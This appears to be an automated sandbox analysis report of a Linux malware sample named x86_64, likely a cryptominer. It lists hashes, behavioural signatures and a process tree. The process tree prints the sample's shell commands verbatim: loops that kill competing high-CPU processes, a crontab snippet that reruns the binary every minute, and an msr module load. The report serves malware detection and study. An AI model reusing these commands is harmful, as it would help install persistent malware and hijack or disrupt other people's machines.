Overview

overview

9

Static

static

x86_64

ubuntu-18.04-amd64

9

Resubmissions

17-08-2022 06:24

220817-g58jwsbfgk 9

17-08-2022 06:04

220817-gsxa4aedh6 9

Analysis

  • max time kernel
    21734s
  • max time network
    111s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    17-08-2022 06:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    x86_64

  • Size

    1.8MB

  • MD5

    6a029df4c5e466511749a1c5321cb576

  • SHA1

    074d800744815a43eac098f0c1b5c03814769bc3

  • SHA256

    a4a90999ade02ca7104e2553aede3c82decbd319d67059d43be99415acb03c26

  • SHA512

    0665dc76cab1c9c0055346c5d080f0caf0abfbd31bc8fab7e3497e16fcd00d2207656fa3421224114d90f8dbc4fc4ca783691c547a5fa70ec6323d522de904b3

Score
9/10
antivm

Malware Config

Signatures

  • Attempts to identify hypervisor via CPU configuration 1 TTPs 1 IoCs

    Checks CPU information for indicators that the system is a virtual machine.

    antivm
  • Modifies hosts file 1 IoCs

    Adds to hosts file used for mapping hosts to IP addresses.

  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

  • Reads CPU attributes 1 TTPs 5 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/x86_64
    /tmp/x86_64
    1⤵
    • Attempts to identify hypervisor via CPU configuration
    • Reads CPU attributes
    • Enumerates kernel/hardware configuration
    • Reads runtime system information
    • Writes file to tmp directory
    PID:592
    • /bin/sh
      sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done"
      2⤵
        PID:593
        • /usr/bin/awk
          awk "/[zZ]/ && !a[\$2]++ {print \$2}"
          3⤵
            PID:595
          • /bin/ps
            ps -A "-ostat,ppid"
            3⤵
            • Reads CPU attributes
            • Reads runtime system information
            PID:594
        • /bin/sh
          sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- 'systemd[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- 'systemd[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
          2⤵
            PID:597
            • /usr/bin/id
              id -u
              3⤵
                PID:598
              • /bin/ps
                ps aux
                3⤵
                • Reads CPU attributes
                • Reads runtime system information
                PID:599
              • /bin/grep
                grep -v grep
                3⤵
                  PID:600
                • /bin/grep
                  grep -v -- "systemd[[:space:]]*\$"
                  3⤵
                    PID:601
                  • /bin/grep
                    grep -v /usr/sbin/httpd
                    3⤵
                      PID:602
                    • /usr/bin/awk
                      awk "{if(\$3>30.0) print \$2}"
                      3⤵
                        PID:603
                    • /bin/sh
                      sh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/x86_64' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/x86_64 > /dev/null 2>&1;' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/x86_64\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"
                      2⤵
                        PID:609
                        • /bin/rm
                          rm -rf /tmp/.cron
                          3⤵
                          • Writes file to tmp directory
                          PID:611
                        • /bin/grep
                          grep -v grep
                          3⤵
                            PID:613
                          • /bin/grep
                            grep -v /tmp/x86_64
                            3⤵
                              PID:614
                            • /usr/bin/crontab
                              crontab -l
                              3⤵
                                PID:612
                              • /usr/bin/crontab
                                crontab /tmp/.cron
                                3⤵
                                • Writes file to tmp directory
                                PID:622
                              • /bin/rm
                                rm -rf /tmp/.cron
                                3⤵
                                • Writes file to tmp directory
                                PID:623
                            • /bin/sh
                              sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'systemd[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'systemd[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'systemd[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'systemd[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
                              2⤵
                                PID:624
                                • /usr/bin/id
                                  id -u
                                  3⤵
                                    PID:625
                              • /usr/bin/crontab
                                crontab -l
                                1⤵
                                  PID:616
                                • /bin/grep
                                  grep -v grep
                                  1⤵
                                    PID:617
                                  • /bin/grep
                                    grep "/tmp/x86_64\$"
                                    1⤵
                                      PID:618
                                    • /usr/bin/sort
                                      sort
                                      1⤵
                                        PID:619
                                      • /usr/bin/uniq
                                        uniq
                                        1⤵
                                          PID:620
                                        • /usr/bin/wc
                                          wc -l
                                          1⤵
                                            PID:621
                                          • /bin/grep
                                            grep -v grep
                                            1⤵
                                              PID:628
                                            • /bin/ps
                                              ps aux
                                              1⤵
                                              • Reads CPU attributes
                                              • Reads runtime system information
                                              PID:627
                                            • /bin/grep
                                              grep -- "systemd[[:space:]]*\$"
                                              1⤵
                                                PID:629
                                              • /usr/bin/awk
                                                awk "{if(\$3>30.0) print \$2}"
                                                1⤵
                                                  PID:630
                                                • /usr/bin/wc
                                                  wc -l
                                                  1⤵
                                                    PID:631
                                                  • /bin/sh
                                                    sh -c "/sbin/modprobe msr > /dev/null 2>&1"
                                                    1⤵
                                                      PID:638
                                                      • /sbin/modprobe
                                                        /sbin/modprobe msr
                                                        2⤵
                                                        • Enumerates kernel/hardware configuration
                                                        PID:639

                                                    Network

                                                    MITRE ATT&CK Enterprise v6

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads